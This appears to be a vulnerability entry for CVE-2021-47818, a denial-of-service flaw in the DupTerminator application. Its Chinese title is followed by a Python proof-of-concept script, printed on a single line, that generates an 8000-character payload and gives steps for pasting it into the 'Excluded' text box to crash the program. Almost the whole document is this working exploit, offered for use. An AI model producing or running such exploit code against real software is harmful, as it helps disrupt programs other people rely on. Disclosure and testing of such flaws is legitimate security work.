CVE-2021-47818: DupTerminator拒绝服务漏洞

#!/usr/bin/env python3 # CVE-2021-47818 PoC - DupTerminator DoS # Description: Generates a payload of 8000 repeated characters # to trigger denial of service in DupTerminator Excluded text box def generate_dos_payload(): """ Generate DoS payload for DupTerminator vulnerability. The application crashes when a string of 8000 repeated characters is entered in the 'Excluded' text box. """ # Payload size: 8000 characters payload_length = 8000 # Generate repeated character payload # Can use any character, typically 'A' or '\x41' payload = 'A' * payload_length return payload def main(): print("CVE-2021-47818 PoC - DupTerminator DoS") print("=" * 50) payload = generate_dos_payload() print(f"Generated payload length: {len(payload)}") print(f"First 50 characters: {payload[:50]}...") print("\nUsage:") print("1. Open DupTerminator application") print("2. Navigate to 'Excluded' text box") print("3. Paste the generated payload") print("4. Application will crash/stop responding") # Save payload to file for manual testing with open('cve_2021_47818_payload.txt', 'w') as f: f.write(payload) print(f"\nPayload saved to: cve_2021_47818_payload.txt") if __name__ == "__main__": main()